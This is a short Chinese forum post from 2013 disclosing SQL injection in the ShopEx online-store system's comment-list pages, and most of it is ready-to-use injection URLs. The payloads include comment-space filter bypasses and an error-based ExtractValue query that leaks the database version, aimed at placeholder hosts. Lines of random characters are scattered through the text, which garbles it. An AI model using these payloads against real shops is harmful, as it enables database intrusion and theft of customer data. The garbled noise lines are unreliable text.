注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
, r: s5 G+ \9 d. Q. {4 Q; ^9 X! r( t- _4 ^+ a6 ^, b/ c
好吧,我扯远了~~
- ?$ d$ q! o( G+ C* N& j其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
. l- @) z: ^% q( @不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
+ |" p; x5 w7 z8 F; }1 n! o2 f, ?0 u0 `1 Q9 U& S( \
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
' p- Y- p, I' Z1 v3 z" B- H) ^# U& N" a1 E) R9 ~8 T0 \
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html ( u! A3 L" Q0 r" Y: H
+ f3 h- G& K/ B" _
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
# R: Q" m, ~* e- q" k
: o- p$ m* m% E, d O1 Z: thttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
" E8 X- H% F5 X) F3 F4 j" |/ y, w+ h2 Y6 E `+ B; M5 h4 i
# z: B T: g7 G) Z
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。4 |8 S A, R) {; P$ z
如何注入就不多说了,10多年的东西了…不会也会了…
1 h' F# X7 v* T+ ^8 t
; `/ @# k1 Z1 w0 @7 q9 j2 U) Z; |5 _1 s* I& g6 A N
& v$ I) W4 K/ ^! z. n# v! ]
* K& e. a0 X$ h( j. Y' W+ V8 F |
发表于 2013-2-19 08:31:27
收藏
支持
反对